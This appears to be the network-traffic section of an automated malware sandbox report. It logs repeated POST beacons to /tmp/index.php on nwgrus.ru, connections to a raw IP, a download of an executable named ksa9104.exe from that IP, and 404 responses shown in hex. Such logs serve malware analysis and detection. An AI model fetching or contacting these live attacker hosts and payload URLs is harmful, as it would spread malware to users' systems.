Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nsmlwxtdmapgbt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mgjceopkpxepxsq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oftgcfgbliielxad.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://drvjksfgomsvmny.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ecoqiraysyfcwnbl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://evxjlpqlxbs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://icaimrqjtfta.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ulydvxuenfbpuxu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gvahueqnuehjgw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tfjoxhiuawit.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fveqebbshittyfl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ymhiquwyrvgqovol.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ydoywfwjttlrcvfk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yjtrvkrlityi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mjjimnkvahrtrhwm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gppslndiqwv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gbbsahanxxry.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qvmvwcqodtkhh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wvcoypmusqw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://drxslflnmsuof.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://juflamsakvad.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://omekhnsmgqeu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nkkmigjawaaknrre.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ewehlvglopwca.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gnpoohklywxdvf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yaiqkdhqwmycp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yrsmvamryedsmns.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vdkygqlrtijypkc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://blhloseiscjcafeh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ficvdttvkapihqjd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rydhygdypun.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tasohhqhxavd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: nwgrus.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164

Source: global traffic	DNS traffic detected: DNS query: nwgrus.ru
Source: global traffic	DNS traffic detected: DNS query: ninjahallnews.com
Source: global traffic	DNS traffic detected: DNS query: fallhandbat.com

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ddmlqgiwokgjnrjp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: nwgrus.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
